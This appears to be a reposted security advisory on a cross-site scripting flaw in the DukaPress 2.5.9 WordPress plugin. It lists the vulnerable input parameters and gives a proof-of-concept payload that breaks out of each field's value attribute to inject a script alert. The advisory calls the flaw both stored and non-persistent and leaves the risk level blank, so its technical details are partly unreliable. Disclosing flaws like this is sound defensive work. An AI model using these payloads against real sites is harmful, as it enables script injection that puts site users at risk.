WordPress Plugin DukaPress 2.5.9 – Cross Site Scripting Vulnerability

A stored Web site script vulnerability has been discovered in the official DukaPress WordPress Plugin web application. The non-persistent vulnerability allows remote attackers to inject their own malicious script code into a client-side application to browser requests. The client-side cross-site vulnerability is in the `label` value of the page module’s GET method request.

(Copy of the Vendor Homepage: http://dukapress.org/)

Vulnerable Service(s):
[+] DukaPress Plugin (WordPress)

Vulnerable Module(s):
[+] Input

Vulnerable Parameter(s):
[+] price
[+] new_price
[+] currently_in_stock
[+] item_weight
[+] digital_file
[+] affiliate_url
[+] delete1

Date of Discovery:
==================

2015-09-21

Exploitation Technique:
=======================

Remote

Platfom Tested:
===============

Windows 7

Levels Risk :

Proof of Concept (PoC):
=======================

<table>
<td><input id="price" name="price" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="new_price" name="new_price" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="currently_in_stock" name="currently_in_stock" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="item_weight" name="item_weight" value=""'/>><script>alert("xss")</script>" type="text"></td>
<td><input id="digital_file" name="digital_file" value=""'/>><script>alert("xss")</script>" type="text"></td> <td><input id="affiliate_url" name="affiliate_url" value=""'/>><script>alert("xss")</script>" type="text"></td>
</table>
<div id="dp_deletestring"><a href="#" id="1">Delete</a>
<input id="delete1" name="delete1" value=""'/>><script>alert("xss")</script>" type="hidden"></div>

 

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*